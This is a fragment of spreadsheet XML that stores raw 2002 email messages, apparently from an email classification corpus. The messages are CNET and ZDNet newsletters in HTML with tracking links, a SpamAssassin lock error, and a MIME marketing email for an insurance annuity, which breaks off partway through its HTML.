 &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwDb_C9x5LF5vLk7KCgFZR" &gt;&lt;img src="http://shopper.cnet.com/i/sh/leaf/checkprices.gif" border=0"&gt;&lt;/a&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 								&lt;/table&gt;
 								&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 											&lt;B&gt;Accessorize your camera:&lt;/b&gt;
 										&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr&gt;
 										&lt;td width=190&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6Bdh4GjkchmobF8XEDxwcdR" &gt;Canon CB-2LS Battery Charger&lt;/a&gt;
 										&lt;/td&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpErnwmubs-10-kl0aSxkZcR" &gt;Canon ACK-500 Power Adapter Kit&lt;/a&gt;
 										&lt;/td&gt;
 									&lt;/tr&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwyqVbxZzl9XGugH6NQYvURR" &gt;Canon 48 MB CompactFlash Card&lt;/a&gt; 
 										&lt;/td&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=fb-aWErQkgq8KaM-AtoFokcTbTDoVFR" &gt;Canon 64 MB CompactFlash Card&lt;/a&gt; 
 										&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;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1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9NwnxZ4h5oPffACEH5fCA9R" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/ce/ps/120/8737557_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=25-inepIbdXN1Y19AGZTscR7jeQrFuR" &gt;&lt;B&gt;Fujifilm FinePix 30i&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 1,920,000 pixels&lt;BR&gt;
 								&amp;#149; 5.3 oz&lt;BR&gt;
 								&amp;#149; Built-in flash&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$245&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzD8LOEf4S7JR1rqAFZcCsR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/ce/ps/120/8653940_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0XsFTbFr_ASOnO8CtmMg4R" &gt;&lt;B&gt;Minolta Dimage X&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping available&lt;BR&gt;
 								&amp;#149; 2.1-megapixels, 1.5-in LCD&lt;BR&gt;
 								&amp;#149; 3 x optical zoom, 2 x digital&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Starting at: &lt;font color="#CC0000"&gt;$282&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=65-K82zIDPtM7sc7KVD70VOf0m8P9eR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/ce/ps/120/7189044_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=7a-EE_AIPBjBeLmlYJhU6coezkBZXyR" &gt;&lt;B&gt;Olympus Camedia D-40 Zoom&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 4.0-megapixel, 1.8-in LCD monitor&lt;BR&gt;
 								&amp;#149; 2.8x optical/2.5x digital zoom&lt;BR&gt;
 								&amp;#149; Incl. 16MB SmartMedia card&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$447&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=8f-OOYvQ8KKO_XRREWXvsg9tyQFWvZR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/ce/ps/120/8984933_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=a4-HGTsQ6paoUMvglG463LvvI2rgYdR" &gt;&lt;B&gt;Canon PowerShot A40&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 2-megapixels, new shooting modes &lt;BR&gt;
 								&amp;#149; 2.5x optical/3x digital zoom&lt;BR&gt;
 								&amp;#149; Professional-level features&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$268&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=b9-WWcsQ-BadUAhp-Ah8FdMkmoOwzcR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/ce/ps/120/9031416_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxw2SBkSe3ufz1Jey2fPRR" &gt;&lt;B&gt;Casio GV-10&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 1,200,000 pixels&lt;BR&gt;
 								&amp;#149; Built-in flash&lt;BR&gt;
 								&amp;#149; 1.6 in LCD display&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$310&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 								&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 							&lt;!-- Product 6 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkWao5q5mbI81u0PT_Qv1dR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/ce/ps/120/9833588_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOWLfZFHDqSM_svdGheo-cR" &gt;&lt;B&gt;Kyocera Finecam S4&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 3,870,000 pixels&lt;BR&gt;
 								&amp;#149; 2.5 x digital zoom&lt;BR&gt;
 								&amp;#149; 3 x optical zoom&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$524&lt;/font&gt;&lt;/B&gt;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&lt;p&gt;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 enables you to streamline 
 your sales process by building quotes and orders online? 
 &lt;P&gt;
 Simply select a customer you've previously entered into 
 ChannelOnline's database and their company information, and
 a customized price profile is automatically applied to their
 quote. You can add products as you search the product 
 database and work on multiple quotes at once as you respond 
 to different customer requests throughout the day. 
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0e--eOTIiQzh-npG3x4r8dJx98lbKRR" &gt;&lt;B&gt;Sign up now&lt;/b&gt;&lt;/a&gt; to streamline your entire buying and selling
 chain. 
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=23-sFcGINM80trF0IQiAv2Y9ZZvQKFR" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;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href="http://clickthru.online.com/Click?q=38-bLkmIRM2Lk6rckhnhJiSUxuD-D9R" &gt;Tech Trends&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZDQA9XJUfdaB0S22bbKAeR" &gt;Hardware&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgZ53I4iZG9TmIKJ15BRyR" &gt;Software&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpsqCYcevWx31g9NPmdZPPR" &gt;Shopping&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBHC__tJ5VFm8il40AWNdR" &gt;Downloads&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKMoKzMFnGkeHaXeD3gBcR" &gt;News&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8JxgIyH2OJ0NpbnpTbdL3ZR" &gt;Investing&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oqt0ErROX7qeZDozn6f5dR" &gt;Electronics&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk2W7SOs-yPhsYK3Awi9qcR" &gt;Web Building&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwrDzMrW-aYYRGOT9_JmpRR" &gt;Help &amp; How-Tos&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=0b-0NI-INQ4duZAyaUGftmZCtvxYhFR" &gt;Internet&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzzWisGbnGtR-pp7us2Qf9R" &gt;Games&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIzYije2zzKNXLTSyPWc3uR" &gt;Message Boards&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcnTbPNjisxoLkkTKhn-yR" &gt;CNET TV &amp; Radio&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2Fz-q0c6fez6pa6cIJPR"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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;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HREF='http://clickthru.online.com/Click?q=75-whTtzbURzckG8Eo2QE9ZwggZpIgWudRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXnda3H20oDO3Nt-tKChBwsR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdLN94QVEYlcGhVIlcU_ZR"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href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1xKZkm-SqJzDxDXozLCdR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkU37fGQ1jg0SxiPZvH6cR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWaO-_jvjQtTbDS-BJjhoRR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwj9BezkvCs3CyJqsjeoFR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=09-joDSIj88wYsf6RzLYSS7ZMgtY8cR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jWHdE8qwsqEsB8LE27qdRR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e440&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=33-vUNnnHjj0EmwshmBi4t2HG78N9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
         &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;ZDNet AnchorDesk Newsletter&lt;/title&gt;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href="http://clickthru.online.com/Click?q=ea-fjLyQhVa-03ajNSAwQ4lAUw-5WnR" &gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/hd_anchor.gif" width="600" height="60" border="0"  alt="AnchorDesk Weekly"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;!--
 &lt;td width=160 align=center valign=top rowspan=2 bgcolor="#ffffff"&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/gl_ad2.gif" width="160" height="16" border="0"  alt="Advertisement"&gt;
 &lt;br&gt;
       &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2766" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;br&gt;
 &lt;/td&gt;
 --&gt;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width=588 bgcolor="#ffffff"&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=588 bgcolor="#ffffff"&gt;
                         &lt;tr valign=top&gt;
                         &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td valign="top" width=550&gt;
                         &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;&lt;br&gt;
                                 &lt;font face="Arial, Helvetica" size="-2"&gt;THURSDAY, JULY 18, 2002&lt;/font&gt;&lt;br&gt;                                                        
                         &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="4"&gt;&lt;br&gt;
                         &lt;font face="Arial, Helvetica" size="-1"&gt;
 &lt;table width="100%" cellpadding="0" border="0" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td valign="top" width="100%"&gt;
 &lt;img src="http://www.zdnet.com/graphics/anchordesk/homepage/title/coursey_david.gif" width="548" height="17"&gt;
    &lt;table cellpadding=0 cellspacing=0 border=0 width=83 align=left&gt;
       &lt;tr valign=top&gt;
          &lt;td&gt;
              &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/authors/144.gif" alt="David Coursey" width="75" height="105" border="0"&gt;
          &lt;/td&gt;
       &lt;/tr&gt;
    &lt;/table&gt;
 &lt;!--
    &lt;table cellpadding=0 cellspacing=0 border=0&gt;
       &lt;tr&gt;
           &lt;td bgcolor="#fff49f"&gt;
              &lt;font face="Arial, Helvetica" size="-1"&gt;
                 &lt;b&gt;&amp;nbsp;David Coursey&lt;/b&gt;
              &lt;/font&gt;
           &lt;/td&gt;
           &lt;td&gt;
              &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/trim_yellow.gif" width="23" height="15" border="0"&gt;
           &lt;/td&gt;
       &lt;/tr&gt;
    &lt;/table&gt;
    &lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
       &lt;tr&gt;
          &lt;td bgcolor="#fff49f"&gt;
             &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=1&gt;
          &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
          &lt;td&gt;
             &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=5 width=1&gt;
          &lt;/td&gt;
       &lt;/tr&gt;
    &lt;/table&gt;
 --&gt;
    &lt;br&gt;
    &lt;font size="3"&gt;&lt;b&gt;Why we're changing our publishing schedule&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;
 Dear Reader,
 &lt;p&gt;
 As of Monday, July 15, AnchorDesk is being published on Mondays, Wednesdays, and Fridays, instead of five days a week. The AnchorDesk Weekly newsletter will continued to be published every Friday
 &lt;p&gt;
 Why are we doing this? There are several reasons, but the most important one is giving me a chance do more than just sit behind a desk typing all day in order to meet deadlines.  I've been writing five columns a week for 18 months now, and I'd be lying to you if I didn't admit to being more than a little tired.  
 &lt;p&gt;
 Also, I've been on such a short leash that I haven't been able to travel or meet as many people as I'd like. This new schedule means I'll have more time to get out, learn more, see more products, and discover new issues or trends. So it should result in a more interesting and useful AnchorDesk for you.
 &lt;p&gt;
 Having additional time also means I will be able to work on several projects I've been assigned, including one that could bear fruit at the Consumer Electronics Show next January. More about that soon, once all the details are nailed down.
 &lt;p&gt;
 For now, the new schedule is being called a "test," which means it could turn out to be temporary--or maybe not. We'll run it through the end of the summer and see how it works. 
 &lt;p&gt;
 I appreciate your continued support of AnchorDesk. While the column will be less frequent, I will still be on &lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QDB2t8PBibgi4cHr7W6TiR" &gt;CNET Radio&lt;/a&gt; every weekday at noon PT (or on-demand streaming anytime) and hope you will join me there.
 &lt;p&gt;
 Sincerely,
 &lt;p&gt;
 David Coursey&lt;br&gt;
 Executive Editor&lt;br&gt;
 AnchorDesk
    &lt;p&gt;
    &lt;br&gt;
    &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;
    &lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;
                 &lt;tr&gt;
 &lt;td bgcolor="#cccccc"&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" width="100%"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
          &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=1 height=10&gt;&lt;br&gt;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href='http://clickthru.online.com/Click?q=15-mYi_zDcPljv7Kw_ayptVLuqA7DVlFsRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIWzgJ4sW5abman8WccrYnR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMPaOwOZn8Hcoh57BymNzeR"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href="http://clickthru.online.com/Click?q=54-l6ovIZK3CjXLSAs0O9U4lR0vdksR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeW6ZS469FBzceCGFySNP8dR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIPiqGqvuYE9IO3JewkhBpuR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=94-rOVNQaIqkZhT6BqJ5elUjfr5JQyR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=a9-IlbqQpUHKediQrqz2JQZv91zVMlR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=be-B7ixQCpFUr8DXfzbnY9y52GfwH4R" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJP46Hxih6GK74p01K7fy3rR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfkjp_EEm0RrAP_kMFIM55iR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOQ_lunkP6O_Iti64Q9t8PR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e501-01&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=13-NxvZnBXUQSFiAcQhwGmmIxOo7RRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Problem with spamtrap
 Could not lock /home/yyyy/lib/spamtrap/spam.mbox: File exists at lib/Mail/SpamAssassin/NoMailAudit.pm line 484, &lt;STDIN&gt; line 207.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Feel The Power!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_1DD90E_01C200E4.C0E7B7B0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Feel The Power	
  Power 7 Bonus Annuity	
 Year 1 	12.35% 	
 Premium Bonus Immediately 	7.00% 	
 Effective 5 Year Yield 	6.43% 	
 Commission 	6.00% (0 - 85) NQ-Q 	
  800-880-3072
 Call or visit our web site &lt;http://www.americanfinancialmktg.com&gt;
 today! 	
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	 	
  	We don't want anybody to receive our mailing who does not wish
 to receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  	
 ------=_NextPart_000_1DD90E_01C200E4.C0E7B7B0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Feel The Power!&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"000066" text=3D"#000000" link=3D"#FF9900" =
 vlink=3D"#FF3333"&gt;
   &lt;table width=3D"550" border=3D"3" cellspacing=3D"0" cellpadding=3D"0" =
 align=3D"center" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF" =
 height=3D"1023"&gt;
     &lt;tr&gt;=20
       &lt;td&gt;=20
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://63.211.81.87/images/amf/header.gif" =
 width=3D"550" height=3D"140" alt=3D'Feel The Power'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://63.211.81.87/images/amf/image2.jpg" =
 width=3D"550" height=3D"384" alt=3D'Power 7 Bonus Annuity'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"490" border=3D"3" cellspacing=3D"0" =
 cellpadding=3D"3" bordercolor=3D"#993333" align=3D"center"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"259"&gt;=20
               &lt;font size=3D"3" face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;&lt;b&gt;Year 1&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
             &lt;td width=3D"209"&gt;=20
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"3"&gt;&lt;b&gt;12.35%&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"259"&gt;=20
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"3"&gt;&lt;b&gt;Premium Bonus Immediately&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
             &lt;td width=3D"209"&gt;=20
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"3"&gt;&lt;b&gt;7.00%&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"259"&gt;=20
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"3"&gt;&lt;b&gt;Effective 5 Year Yield&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
             &lt;td width=3D"209"&gt;=20
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"3"&gt;&lt;b&gt;6.43%&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"259"&gt;=20
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"3"&gt;&lt;b&gt;Commission&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
             &lt;td width=3D"209"&gt;=20
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"3"&gt;&lt;b&gt;6.00% (0 - 85) NQ-Q&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;img src=3D"http://63.211.81.87/images/amf/phone2.jpg" =
 width=3D"550" height=3D"89" alt=3D'800-880-3072'&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"7" bgcolor=3D"#333399"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 color=3D"#FFFFFF"&gt;&lt;b&gt;
               Call or visit our &lt;a =
 href=3D"http://www.americanfinancialmktg.com"&gt;web site&lt;/a&gt; =
